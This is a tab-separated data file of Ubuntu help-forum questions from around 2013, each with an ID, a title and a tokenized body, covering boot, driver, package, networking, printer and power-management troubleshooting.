317890	console : switching off a built-in backlight	i 'm trying to find out how to power off the backlight in a device i 'm using with a built-in screen . i believe that dpms works with the screen , but x is not installed , so i ca n't use xset . i thought the non-x11 alternative was setterm and i 've tried ( as root ) the following : setterm -powersave powerdown > /dev/tty1 to set the dpms state when the screen is blanked . however , i get the following error : setterm : can not ( un ) set powersave mode : invalid argument i get a similar error on other ubuntu installs on different hardware and for any variation on the -powersave options listed in man setterm . why am i getting this error ? is there another ( non-x11 ) way to send dpms commands to the hardware ? background the device is an o2 joggler ( based on the openpeak openframe 7 ) which has an i386 architecture ( intel atom ) . i 'm running a slightly modified community-supplied version of 12.04.02 server . this modified version comes with a driver which provides sysfs screen control , including a writeable psuedo-file to supposedly switch off the backlight , but you can still see it glowing in a darkened room . i 'm hoping there will be a way to power it down completely .
317891	cant install anything on ubuntu 12.04 after power failure	i was installing google earth from a package , and my power went out in mid-way . when i power on my computer a pop up comes saying system problem detected . now i can not install anything , no updates , missing plugins , open up software center , nothing . in the notification area an error message comes stating the following : an error occurred , please run package manager from the right click menu or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : ' ( lessthansign ) type'exceptions.systemerror ' > ' ( e : the package google-earth-stable : i386 needs to be re installed , but i can't find an archive for it . ) this usually means that your installed package have unmet dependencies i am really up set : here are the technical details :
317895	ca n't get 32 bit ubuntu to boot on a macbook	i have tried 12.04 and 13.04 and neither one creates a bootable disk . i already have 64 bit ubuntu but need 32 bit for a specific program that i need to run . i have tried startup disk creator on ubuntu , and tried several methods on os x but none of them create a disl that will show in the boot options . i tried penguintosh and that got it to show up and it booted as far as the starting kernel message but then it hung there for hours . i have tried redownloading , and as i said multiple methods of creating the boot disk . i 've been trying to make this live usb for almost a week now lol . i do n't have cd 's . any suggestions ?
317901	workflow with self made packages	i have a folder ~/packaging where all my public and private packages are in . for example , in the packaging/think-rotate folder , there is the typical debian stuff , like so : think-rotate-2.5.2/ think-rotate-2.5.2.orig/ think-rotate-2.6/ think-rotate-2.6.orig/ think-rotate_1.0.tar.gz think-rotate_2.5.2-0ubuntu1.debian.tar.gz think-rotate_2.5.2-0ubuntu1.dsc think-rotate_2.5.2-0ubuntu1_source.build think-rotate_2.5.2-0ubuntu1_source.changes think-rotate_2.5.2.orig.tar.gz @ think-rotate_2.5.2.tar.gz think-rotate_2.5.orig.tar.gz @ think-rotate_2.5.tar.gz think-rotate_2.6-0ubuntu1_all.deb think-rotate_2.6-0ubuntu1_amd64.build think-rotate_2.6-0ubuntu1_amd64.changes think-rotate_2.6-0ubuntu1.debian.tar.gz think-rotate_2.6-0ubuntu1.dsc think-rotate_2.6-0ubuntu1_source.build think-rotate_2.6-0ubuntu1_source.changes think-rotate_2.6-0ubuntu1_source.stable.upload think-rotate_2.6.orig.tar.gz @ think-rotate_2.6.tar.gz i have some script that goes through my projects and generates the latest .tar.gz from my source code . so for the matter of this question , new tar archieves pop up in the packaging directory every now and then . since i do not want to run uupdate ../….tar.gz on every project by hand , i wrote a python 3 script which takes care of that , runs debuild -s and dput to upload it to my launchpad ppa , and then debuild to build it for my local machine . the debian changelog is just populated with the default “new upstream release” message . those packages are more for organized local deployment , than for the general public . the script then also uses apt-cache show to check whether the latest version is installed , and if not , uses dpkg -i to install that package . this works somewhat , but i encountered a couple problems with my current version of that script : when i upgrade my machine to a new ubuntu version , it does not rebuild everything . so i have a lot of packages that did not receive any upstream updates , and the latest version in my ppa is quantal , not raring . packages are build for amd64 on my main computer , and often can not be installed on my other computer , which has i686 . some packages are all , so that does not hurt . but i would need to rebuild the any packages on that machine . the launchpad ppa takes care of building it for every architecture , but my script did not upload that package for raring , see first problem . to summarize , the workflow has to contain all those steps : extract new source tar archive and update the debian/changelog . ( uupdate ) if not already uploaded to ppa , build a source package and upload it to the launchpad ppa . but only do this , if this is public package , do not upload my private packages to the ppa . ( debuild -s and dput ) if the package needs to be upgraded locally , build a binary package for the current architecture and install it . ( debuild and debi or dpgk -i ) check if the series is outdated , i. e. the latest upload was for quantal , and the current system runs on raring . if so , rebuild the source again and upload to ppa . before you say that i should work on every package by hand , keep in mind that i have 43 packages sitting around , and i would really like to save work here . i could work on my script to work around the current problems , but i 'd rather use something that already works instead of rolling my own . is there some tookchain or workflow that maintainers use in order to keep so many packages up to date in their ppas or official repositories ? update 2013-07-08 : i now worked on the script to handle the problems as well . but i am still interested in a canonical solution .
317906	ubuntu randomly change resolution by itself to 1024x768	i 'm running 13.04 on an ibm machine with integrated intel graphics on a 1920x1080 monitor . when i boot up , the resolution is fine for a couple of seconds and then the screen goes black , and the display change to 1024x768 resolution . i am able to temporally fix the issue by just opening the display setting screen and ( very stragely ) the screen comes back to my 1920x1080 optimal resolution . i have to do this every time i boot up , lock the computer , or open some applications for the first time ( ex . google chrome ) . i tried to install drivers for intel graphics , event though i read that they are already supported by ubuntu . i have a dual boot setup with windows 7 and the problem only occur in ubuntu . thanks alot for your help !
317907	is it possible to stream music from ubuntu one music to samsung galaxy s4 ?	is it possible to stream music from ubuntu one music to samsung galaxy s4 ? if so , how can it be done ?
317908	screen turns black during the installation of ubuntu 13.04	i was following the uefi guide to install ubuntu on a new computer but after reaching the screen below and selecting install , the screen just turns black and nothing happens . i already disabled fast boot , safe boot , intel srt , and disabled raid .
317909	not able to see the contents of the partition	suddenly in ubuntu i am not able to see the contents of one of my partition . they do exist . i am able to see them in windows but not in ubuntu . the partition is ntfs . can anyone please tell how can i solve this issue ? when i try to mount the partition i am getting some error ( `` input/output error '' ) . any kind of help will be appreciated . thanks .
317914	i downloaded ubuntu 12.04 and i ca n't boot it from the usb	my windows 8 is 64 bit version and the ubuntu iso that i downloaded is the 32 bit version . the problem is that downloading it took a long time because of my slow connection . is there a way i could install it alongside windows 8 64 bit ? i recently had windows 7 on this same machine and i updated windows later . at that time , i could easily install ubuntu along side windows 7 . need some help on this guys .
317915	why /dev/disk/by-id/ change after a suddenly server power-off ?	i 'm management a server that in /etc/fstab have references to some partitions using /dev/disk/by-id/disk_id-partn . the server suddenly power-off and disk_id part of /dev/disk/by-id/disk_id-partn changed . i always refer partition in /etc/fstab using uuid and will change the conf of fstab , but still i want know why the by-id change when tons of people on internet said that such hard disk identifier do n't change , even i read that opensuse use by-id in tis fstab . can partitions *uuid*s change too after a suddenly power-off ? are *uuid*s less `` mutable '' than *by-id*s ? i think that an explanation from where by-id come will help me to understand all this . i read that uuid is stored in the partition and just change its value after partition formatting , but not know much about by-id , just that udev is who generated-create it , but basing in what ?
317919	standby does nearly save no power on desktop pc	about 16 weeks ago , i switched over from windows 7 to ubuntu 13.04 , because i could work more efficiently with it . but i kept windows 7 in a dualboot . i noticed the following : when windows 7 ran idle , the power consumption was : 88 w when windows 7 was sent into standby , it was : 23 w when ubuntu 13.04 runs idle , it is now : 133 w when ubuntu 13.04 is sent to standby , it is : 101 w what is up with that power management ? standby power consumption seems horrible to me and could be a reason for me to switch back to windows , as i use standby quite often instead of shutting down , as i have to open lots of tools ( and login etc . ) each time . all measurements were made with the same measuring equipment and the same periphery ( everything turned on ) . the computer definitely goes into standby , as the power led becomes blinking and coolers are shut off . what could i do to make power consumption better , especially in standby ? system specs : intel ( r ) core ( tm ) i3-2120 cpu ( stock clocks and voltage ) asus p8h77-m pro bequiet straight power e9 400 w some commands ' output that could help : sebastian @ uve : ~ $ uname -a linux uve 3.9.0-030900-generic # 201304291257 smp mon apr 29 16:58:15 utc 2013 x86_64 x86_64 x86_64 gnu/linux sebastian @ uve : ~ $ top top - 23:00:35 up 13:38 , 2 users , load average : 0,26 , 0,32 , 0,38 aufgaben : 262 total , 1 running , 258 sleeping , 0 stopped , 3 zombie % cpu ( s ) : 2,3 us , 0,8 sy , 0,0 ni , 96,9 id , 0,0 wa , 0,0 hi , 0,0 si , 0,0 st kib mem : 7861716 total , 4012328 used , 3849388 free , 28644 buffers kib swap : 2088956 total , 1109900 used , 979056 free , 1407520 cached sebastian @ uve : ~ $ lsmod module size used by msr 12908 0 nfsv3 34774 1 nfsv4 217180 0 usblp 18284 0 hid_generic 12548 0 usbhid 47346 0 hid 101248 2 hid_generic , usbhid vmnet 55771 17 vsock 52846 0 vmci 87554 2 vsock vmmon 76108 5 snd_hda_codec_hdmi 37407 1 snd_hda_codec_realtek 46511 1 coretemp 13596 0 snd_usb_audio 147350 2 uvcvideo 82296 0 kvm_intel 138733 0 videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc snd_usbmidi_lib 29477 1 snd_usb_audio kvm 452835 1 kvm_intel videobuf2_core 40785 1 uvcvideo videodev 131329 2 uvcvideo , videobuf2_core snd_hda_intel 44397 3 snd_hda_codec 190010 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel ghash_clmulni_intel 13259 0 snd_hwdep 13613 2 snd_usb_audio , snd_hda_codec usb_storage 61749 0 cryptd 20501 1 ghash_clmulni_intel snd_pcm 102477 4 snd_usb_audio , snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18798 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi eeepc_wmi 13151 0 asus_wmi 24794 1 eeepc_wmi snd_rawmidi 30417 2 snd_usbmidi_lib , snd_seq_midi sparse_keymap 13890 1 asus_wmi snd_seq 61930 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi ppdev 17106 0 psmouse 97838 0 microcode 22923 0 snd_timer 29989 2 snd_pcm , snd_seq bnep 18258 2 rfcomm 47863 0 bluetooth 251354 10 bnep , rfcomm serio_raw 13215 0 i915 631614 4 parport_pc 28284 1 snd 69533 22 snd_hda_codec_realtek , snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_seq_device nfsd 260175 2 auth_rpcgss 40877 2 nfsd , nfsv4 nfs_acl 12883 2 nfsd , nfsv3 nfs 170267 3 nfsv3 , nfsv4 video 19467 2 i915 , asus_wmi lockd 77317 3 nfs , nfsd , nfsv3 sunrpc 242438 23 nfs , nfsd , auth_rpcgss , lockd , nfsv3 , nfsv4 , nfs_acl drm_kms_helper 49082 1 i915 binfmt_misc 17540 1 fscache 57914 2 nfs , nfsv4 mac_hid 13253 0 wmi 19256 1 asus_wmi drm 295908 5 i915 , drm_kms_helper mei 46588 0 soundcore 12680 1 snd lpc_ich 17060 0 nls_iso8859_1 12713 1 i2c_algo_bit 13564 1 i915 lp 17799 0 parport 46562 3 lp , ppdev , parport_pc r8169 68680 0 ahci 30063 4 libahci 32088 1 ahci i hope the gurus can solve my issue : -/ .
317924	dual boot install	i have a 64-bit win7 laptop and i would like to try ubuntu with dual-boot option . can i install ubuntu on a sd or flash drive and have everything related to ubuntu including programs , apps , etc on that drive instead of on my harddrive and still have dual-boot ?
317928	hyperlinks clicked in evince document viewer are not opening , any ideas on how to fix ?	as it was instructed in another thread here in the forums , i opened the /usr/share/applications/mimeinfo.cache file to check for correct references . and noticed this does n't seem to be the problem , there even are 3 optional browsers to use . x-scheme-handler/http=google-chrome.desktop ; chromium-browser.desktop ; firefox.desktop ; x-scheme-handler/https=google-chrome.desktop ; chromium-browser.desktop ; firefox.desktop ; i already checked that the programs are correctly named , using the `` which '' command in the terminal , like this : $ which google-chrome $ /usr/bin/google-chrome so google-chrome should be the first option and yet the order to open a url does n't seem to be arriving to the program , not even to the 2nd or 3rd option for that matter anyways . also , the 'get help online ... ' command in the 'help ' menu does n't work . so it is not a problem with the specific document file either . i 'm running ubuntu 12.04 lts . if you need to ask for more relevant details , please do . it would be nice to have various opinions on how to solve this , thank you : - ) update : i ran evince from the terminal as asked ( awesome suggestion by the way ) . this is what i 'm getting when trying to open a link : /opt/google/chrome/google-chrome : line 42 : /opt/google/chrome/chrome : permission denied /opt/google/chrome/google-chrome : line 42 : /opt/google/chrome/chrome : success should i try the fix you suggested even if my error log is different ? update : tried @ maggotbrain 's solution and bingo , now i can study pdf references faster thanks to you bro !
317933	what is the battery life of lenovo t431s with ubuntu ?	i realize that some of you may own a lenovo t431s laptop . could you please share , what is a realistic battery life that i could expect from it with web/wifi/coding usage ? i could n't find any linux benchmarks anywhere from the internet yet . thank you !
317938	login does not work because of a broken /home directory	by mistake , as admin ( having invoked gksu nautilus ) , i renamed my /home/user_name_here '' folder to new_folder_name and ( not aware of the stupid thing i was doing at the moment , attempted to ) moved it inside my /home/user_name_here folder , so that its contents would then be in /home/user_name_here/new_folder_name . what followed was that it started moving the files ( quite slowly ) and froze at about 33 % along the way . the folder /home/new_folder_name ( there was no /home/user_name_here folder anymore ) became empty and i could n't access my files anymore . i restarted the pc and the situation got worse - i could n't log in to my account anymore and i can not access the files through a guest session .
317940	playing video files with vlc from public folder	so me and my father each have computers , his ubuntu 12.04 and mine ubuntu 13.04 , with shared folders containing videos . i can mount his public folder , view folder contents and copy to my machine but can not play anything with vlc without copying beforehand . i receive the following error . file reading failed : vlc could not open the file `` /run/user/kevin/gvfs/dav+sd : host=al % 2527s % 2520public % 2520files % 2520on % 2520mine._webdav._tcp.local/video.mkv '' . ( input/output error ) your input ca n't be opened : vlc is unable to open the mrl 'file : ///run/user/kevin/gvfs/dav % 2bsd % 3ahost % 3dal % 252527s % 252520public % 252520files % 252520on % 252520mine._webdav._tcp.local/video.mkv ' . check the log for details . i 've checked back and forth , we both have the same permissions set , no firewalls . the thing is , on his computer , i can mount my public folder and play videos without any additional settings beyond sharing the folder itself .
317943	operating system not found after live dvd instalation	i tried to install 13.04 from a live dvd after failing repeatedly to create a bootable usb . it says it installs and tells me to reboot but when i do refind ca n't find any bootable partitions . i already have os x and 12,04 64 bit , but i really need 32 bit . any ideas what could be going wrong ?
317944	what problem should/can i solve first ?	i am currently running ubuntu 13.04 x64 with brand new hard drive to replace a damaged component , on my 17.5 inch wide screen gateway laptop with mostly after market components . can not remember the exact specs , it was a gift . list of problems in inverse order of calamity . -the only aspect ratio choice is 1024 x 720 ( 4:3 ) and it gives me a head ache . -frame rate locked at 30 when my refresh rate is 120 . -performance all proses are running really slow even mouse movements . -unable to install new applications like sdks that i was looking forward too because .exe ( among most other file types ) files are not recognised even after hitting the check box for running code in the selected file or using command line prompts . -alt+f2 command line codes seem to have no effect no matter what i do with it . ( may be user error and could use a link to an explanation of how to use it . but copy , past , enter or double click only seems to close the command line . ) -unable to shut down or restart , the first time i tried to turn it off after installing 13.04 it displayed text on screen about what it was doing . halting system/ubuntu.iso [ failed ] and then a few lines latter running c : :/system/path i can not remember/halt /halt not found i waited 10 minuets then hit ctrl+alt+del and then about 20 secants latter i got /debg not found . followed by running `` same path as for halt '' /restart /restart not found . solved by hard boot . sense then it just goes to black light screen at full brightness , and proceeds to over heat . the good news is that suspend works as intended . -attempting to install an earlier stable version of ubuntu failed even following the directions given on the site or in forums , but perhaps due to other above problems . when i completed all the steps the frames closed and no changes had taken place or further actions like restarting accrued . the system still says it is running 13.04 -the problem that exist between chair and key board is having difficulty finding where to start in the operations manual . at least opening and using default applications works even if slowly . please tell me where i can find what more information is needed , if any . tl : dr `` panic . panic . panic . it is broken . where do i start ? and how ? ''
317945	lost hard drive while upgrading	while upgrading from 12.04 to 13.04 , everything appeared to be going fine until the very end when a couple of quick red failed messages appeared during final cleanup . the desktop screen lost all icons and froze . i am using an ocz 120 gb solid state sata drive . my bios can see it but my original 12.04 booted from my thumb drive ca n't . any ideas on how to get access to the drive so i can reformat and try a fresh install of 13.04 ?
317947	my kindle 4 is no longer recognized : how can i get it to work again ?	when my kindle was connected to my ubuntu laptop it suddenly rebooted.. all the documents are gone and it is no longer recognized by ubuntu . i have reformatted the partition ( fat32 ) using gparted , but it still is not recognized . what steps could i take to make it work again ?
317949	windows 8 and ubuntu on seperate hdd using grub2	i have a new windows 8 tower . i installed my old hdd in the tower so i could install ubuntu and have a dual os system for fun and development . i am have a problem with grub2 running a dual boot . it will start the windows 8 os but not the ubuntu . to have the dual boot work correctly do i have to install grub2 on my windows hdd or on the ubuntu hdd ?
317950	how do i run/execute this file `` openvpn gui for linux '' ?	i stumbled on this web page : http : //sourceforge.net/projects/sogfl/ ? source=navbar how do i install the downloaded file called sogfl_v0.1.0.1.tar.bz2 in ubuntu ? some help would be much appreciated .
317952	i need to install 12.04 lts over 13.04	i dont have blank cds i can burn with , and it seems like if i install from a usb i cant remove the usb or the os goes haywire . i want to eventually have 1 hdd with 2 partitions , 1 for ubuntu 12.04 lts and one for windows xp . then i am going to split my extra hdd in half ( if required ) for storage space . this way i have a dedicated hdd to oses and 1 for whatever i happen to download and install .
317958	stop kazam recording with xmonad ?	i am very pleased with kazam as a screen recording software . it runs smoothly , and allows to simultaneously record the monitor of my system audio and an external microphone . however , i like to use xmonad as my window manager . as a result , i can not figure out how to stop a recording , as no toolbar icon is present . is there any way to stop a kazam recording without using gnome or another desktop environment ? any other suggestions ? i have tried using super+ctrl+f to no avail .
317960	function to change title does n't work when run in script	i 've got a simple command that sets the term title : # allow the user to set the title . function title { prompt_command= '' echo -ne \ '' \033 ] 0 ; $ 1 ( $ pwd ) \007\ '' '' } export -f title i 'd like to access this from a script : 16:28 $ cat ./scripts/webserver.sh # ! /bin/bash title 'webserver' nodemon ./app/webserver.coffee i 've placed title in .bashrc , .bash_profile and .profile and sourced every one of those files after . i can run the title function fine from the command line . regardless of what i do , the title function does n't run when i run my script file . there 's no error , just no change to the title . what am i doing wrong ? a bit more info : i added an echo 'changing title ' line in the title function . the echo is being output but the title is n't being changed . so there must be a problem with the title function ? related : how to change gnome-terminal title ?
317965	wubi error after installation on windows 8 laptop	i try to install ubuntu on a laptop which actually runs with windows 8 . after the installation and restart , itâ´s this error : \ubuntu\wubildr.mbr staus : 0x0000076
317969	matlab 's icon instead of android studio 's icon is shown for android studio 's project in unity side panel	i 'm have installed matlab and android studio on ubuntu 12.04.2 . when i open android project in studio , matlab 's icon is shown for opened project instead of android studio 's icon in unity side panel ( note that android studio 's icon is shown for several seconds at the beginning ) . but if i open main android studio 's window , icon is correct . why ? the contents of matlab.desktop and android-studio.desktop files respectively : [ desktop entry ] version=1.0 type=application terminal=false exec=matlab -desktop name=matlab icon=matlab categories=development ; math ; science comment=scientific computing environment and [ desktop entry ] version=1.0 type=application name=android studio icon=/usr/bin/android-studio/bin/idea.png exec= '' /usr/bin/android-studio/bin/studio.sh '' % f comment=develop with pleasure ! categories=development ; ide ; terminal=false startupnotify=true startupwmclass=jetbrains-android-studio
317970	13.04 pptp vnp to windows server but no internet	i am currently running on an ubuntu 13.04 environment . i am able to connect just fine to my office vpn , the only problem i am having now is i do n't have internet access once i am connected . there is a little lock symbol next to the internet connection symbol in the top right hand corner by my clock . i know when i was on a windows machine i was able to vpn and piggie back off the office ip address just fine . is there a setting i need to change on my ubuntu machine to do the same ?
317971	screen rendering problems in unity and gnome 3 ( ubuntu 12.04 64-bit )	a friend who runs ubuntu 12.04 , 64-bit , experienced screen rendering problems after an update . symptoms include : a ) in unity ( 3d ) , opening an application window in desktop 1 opens it in desktop 2 . one can not go to desktops 2 or 4 ( the 2 right-hand desktops ) but one can drag it back to either desktops 1 or 3 ( the two left-hand desktops ) . b ) in gnome-classic-fallback , no menus or any other items show up -- it 's simply a blank screen . it appears that the screen is rendered to be bigger than available screenspace . trying to fix this by changing the screen resolution does n't work . c ) in gnome3 shell , pressing the window key does n't bring up the menus ( again , probably of-screen ) d ) unity 2d works normally . e ) i installed enlightenment window manager , and it works normally . i would think that from the above this would be a compiz problem , and that the thing to do would be to purge compiz and re-install . but i thought that gnome3 used metacity , not compiz . any replies or suggestions appreciated . edit : 10-16-2013 . i went back to my friend 's computer ( finally ! ) and completely removed and re-installed compiz ( along with unity aund ubuntu-desktop ) . that did not solve the problem . instead , i found things worse , as i got a really ugly ubuntu splash screen . then i just happened to look at the driver information . the nvidia 304 driver was installed . i went and installed the latest updated version of the 319 driver ( did n't work ) then the recommended version of the 319 driver ( did n't work ) and finally i removed all the nvidia drivers completely . that worked , restoring the ubuntu splash screen ( well almost , it could use a higher resolution ) and also the gnome and unity desktops . remaining problems : a ) i ca n't drag a window between workspaces in unity ; this suggests that the 3d acceleration for the nouveau driver for this card ( i can update that later ) is lacking ; b ) the maximum screen resolution is 1280 x 800 , less than what it should be ( i think 1440 x 900 ) and it detects the monitor as a `` laptop '' instead of a desktop monitor . this means i need to tweak a screen resolution setting . c ) there 's also the problem with the splash screen resolution , but i 've done that before , similar to this . d ) grub will not come up by holding down the shift key ; and that 's a probably unrelated problem .
317973	i think i may be running two instances of ubuntu at the same time	when i log in , usually i see my background and a box with my username and asking for a password . however , recently , i see my desktop ( complete with the task bar on the side and top and battery indicator and i can shut down or restart and everything ) and when i log in , everything seems to be normal but then i realized that behind the icons on the left side there is actually a 2nd set . everything works normally , i 'm just scared because this has never happened before . and i have tried shutting down and restarting . in the screenshot you can see that behind the icons there is a 2nd , different set . they are present during my log in and i ca n't get rid of it . it 's not really doing anything but it may be slowing my system down .
317974	how do i print files in 12.04 using a samsung 620	i 've moved to a new installation of 13.04 from 10.04 where the same printer , a samsung clp-620nd , was working fine . as with 10.04 , printer installation was automatic with the printer detected as a network printer and the driver installed automatically . all good stuff . the printer printed the monochrome self test page when i installed it and choose the print test page option . i can print text files from the command line using 'lp ' but if i try to print a pdf or an image the printer hums briefly and the item appears in the print queue but then just disappears from the queue with nothing emerging from the printer - the printer displays 'ready ' throughout . this was happening from my wife 's 12.04 upgraded laptop while it was still working fine on my 10.04 desktop . now i 've upgraded my desktop to 13.04 it is displaying the same symptoms as the 12.04 laptop so it seems that this is a driver issue that arose in 12.04 and is not addressed by 13.04 rather than a problem with the printer itself . help !
317977	how do i perform a backup of sudoers file ?	after reading the following two posts : trying to install an openvpn gui messed up sudoers standards accounts are able to get root access using sudo without password request i would like to learn how to perform a backup of /etc/sudoers file so that i can restore it in the event of a mess-up after installing a non-ubuntu-package-ready software . any help would be much appreciated .
317980	ubuntu touch os for desktops	if i were to build a desktop pc with a touch screen , is it possible to run a stable version of ubuntu touch on that pc ? if so , where can i find it ?
317984	apt-get do n't let me install any package	im using ubuntu server 12.04 i686 when i try to update/install any package , always appear an error like this dpkg : dependency problems prevent configuration of libpam-winbind : libpam-winbind depends on winbind ( = 2:3.6.3-2ubuntu2.6 ) ; however : version of winbind on system is 2:3.6.3-2ubuntu2.3 . dpkg : error processing libpam-winbind ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libpam-winbind reading package lists ... building dependency tree ... reading state information ... you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libpam-winbind : depends : winbind ( = 2:3.6.3-2ubuntu2.6 ) but 2:3.6.3-2ubuntu2.3 is to be installed winbind : depends : libwbclient0 ( = 2:3.6.3-2ubuntu2.3 ) but 2:3.6.3-2ubuntu2.6 is to be installed depends : samba-common ( = 2:3.6.3-2ubuntu2.3 ) but 2:3.6.3-2ubuntu2.6 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and when i perform apt-get -f install , appears an error saying that several dependencies are outdated , specially `` winbind '' . what can i do ?
317986	install 13.04 from usb on dell inspiron 600m	i am trying to boot from a usb drive . i created the usb on an acer running win 7 home premium . i used the ubuntu-13.04-desktop-1386 using the universal usb installer . i am trying to install on a dell inspiron 600m . when i try to boot , i get a message `` syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. peter anvin et al '' the next line has a blinking underscore . it will not allow me to enter anything . what do i do ? did i try to use the wrong version linux ? if so , what should i use ? i do n't care which version from 12.04 - 13.04 i load . i couldeven use an earlier version if it will work . i just want it to boot , so i can install linux as the only os on this machine .
317988	making a network drive faster to access	i have mounted a 450 gb logical volume in ubuntu and i am sharing it over the network using samba . on my mac , i am able to connect to the shared folder and mount the volume ; however , it takes minutes for me to see all of my files , which consist of music and photos . is there any way to speed up this process ? i know that windows 7 , for example , can index drives , but would this work even if the server is turned off and on again ? my ubuntu server is using ethernet .
317989	ad hoc network ip issue	i 'm trying to set up an ad hoc network between an artigo a1000 system ( running ubuntu 11.10 ) and my computer ( running mac os x ) , and i ca n't seem to get the connection working . i 've tried setting up the `` server '' on both computers , and i 've managed to connect with the other computer ( at least , all indications say i have ) . however , pinging the other computer does n't seem to work regardless of which computer i use ... i 've tried pinging the address of the other computer , the `` router '' address , and all of the pings fail with a `` request timeout . '' i originally kept the settings so that ip addresses would be assigned by the computer that was `` hosting '' the ad hoc network , but an ip was never found by the artigo , so pinging the computer was impossible . i 've also tried manually assigning static ip addresses to both computers using the same subnet/gateway ... which still does n't seem to work . has anyone ever had this same issue , and if so , what pointers would you possible have ? thanks ! p.s . the end goal is to create an ssh server on the artigo ubuntu system that my computer will be able to connect to in order to transfer files , run code , etc . if anyone has a better idea how to accomplish this without setting up this network , i 'm very willing to listen .
317992	ca n't see my external hard drive ?	usually on a windows computer , you would plug-in the external harddrive and it would show up on the `` my computer '' or something would popup saying you want to few the files inside of this . but when i do this in my ubuntu computer it does n't show up or anything . i tried sudo lsusb and it shows that it is plugged in and active and when i unplug and refresh it is gone and replug back again . so , i know it 's working . my question is how do i view the files on my harddrive ?
317994	grub installed on /dev/sda1 , `` no such partition '' after image restoration	my partition setup is : [ win7 ] [ ubuntu ] [ extended [ logical partition ] ] ( in that exact order ) the bootloader installed in the mbr is a non-standard one that allows you to chainload a secondary bootloader on another partition . i use the this option alternatively boot ubuntu via grub installed on /dev/sda1 . this setup has always worked for me , but after upgrading my hard drive , i ca n't seem to restore grub to a working state . i upgraded by restoring recent backup images to the drive ( this has worked for me in the past ) but , this time , i just get : error : no such partition . grub rescue > i can boot the ubuntu installation with this at the rescue prompt : set root= ( hd0,1 ) set prefix= ( hd0,1 ) /boot/grub insmod normal normal but it 's pretty silly to type that in every time . this is my disk layout according to fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes device boot start end blocks id system /dev/sda1 122896725 146336084 11719680 83 linux /dev/sda2 178053120 976773119 399360000 5 extended /dev/sda3 * 929 122881184 61440128 7 hpfs/ntfs/exfat /dev/sda5 178055168 976773119 399358976 7 hpfs/ntfs/exfat partition table entries are not in disk order i 've tried grub-setup , grub-install , boot-repair ( which does n't work because it only offers the option to install to mbr ) , none have worked . i have a usb thumbdrive with grub installed ( which works when i use it to boot to the ubuntu installation on the laptop at /dev/sda1 ) and its grub.cfg file is identical to the one on /dev/sda1 . if i had to guess , does the fact that the order of the partitions listed in fdisk -l does n't match the order they 're arranged on the disk have effect on this ? when i type set at the grub prompt i get prefix= ( hd0 , msdos2 ) /boot/grub root=hd0 , msdos2
317998	accessing previous purchases	i purchased steel storm burning retribution back in 2011 . now that i have a new laptop with 13.04 i logged in to the software center to re-install it , but the previous purchases screen comes up empty . i can search for it , but clicking on more info results in a message that it 's not available in my current software sources . if i do n't log in , i can see it and have the option to buy it . any ideas what could be happening ?
317999	ca n't get any programs	somehow i 've lost my icon for starting the ubuntu software center and can not install any programs or remove any programs . can you advise as to how to get one installed again ? i 'm using ubuntu 12.04 with the icons on the left side of the desktop .
318005	can not boot windows 7 after installing ubuntu 13.04	so i boot up my computer after installing ubuntu 13.04 . grub correctly shows me all available boot options and i am able to boot to ubuntu . however , when i try to boot into windows 7 , grub hangs at a purple screen . i have an hp laptop . it came with all four primary partitions taken up by the windows bootloader , the actual windows partition , one called hp_tools , and another for hp restore . i was able to back up and delete hp_tools and the recovery partition , and change my disk type from dynamic to basic ( gparted does n't recognize dynamic drives ) . i then booted into a live session of ubuntu and made two partitions with gparted : one large partition for storage space that i could use between the two operating systems ( sda4 ) , and another extended partition ( sda3 ) which contained ubuntu ( sda6 ) and it 's swap space ( sda5 ) . it currently looks like this : i 'm not sure if the second paragraph is actually relevant , i just want you to know all the variables in the equation . thank you in advance for helping this poor noob .
318006	ubuntu server version 12.04.2	i am having trouble installing the 32 bit version of ubuntu server 12.04.2 on my 32 bit microsoft virtual pc player ? i get to the point of installation where it says i have no disk drive detected and gives me an assortment of options to choose from to download drivers ? i have no clue how to find the necessary driver . the pc i am using is a dell inspiron n4110 with an intel i3 processor . please help ! ! !
318012	openssh-server package not available on 12.04.2	i have just done a fresh install of 12.04.2 and found out that i could not ssh to this pc . i tried to install openssh-server but it said that `` package openssh-server is not available ... '' what is missing ?
318017	how do you get the mozzila firefox beta ?	64 bit . title explains it all . just want firefox beta .
318021	some webpages not opening in any browser	i have using ubuntu 12.04lts with all available updates installed . some websites are not opening in any browser , i have tried many browsers ( firefox , chrome , chromium , arora , xxxtrem browser , midori ) . but yesterday i have install the ubuntu 12.04 ( the first release of this version ) in my pen drive and use it . in usb booted ubutu , all websites are open properly or we can say that in older version of browsers websites are opening ( in usb booted ubuntu firefox version is 11.0 ) but now in updated ubuntu 12.04lts websites are not opening . i have read some solution about this problem but they are says to change dns server but i think this is not dns server problem because with same dns settings websites are opening properly in the windows and usb booted ubutu . please tell what will be solution ? website which i tried to open are yahoo.com , skydrive.live.com , indiarailinfo.com
318023	ubuntu 13.04 upgrade	do i retain all the software installed in ubuntu12.10 after upgrading to 12.04 specially eclipse
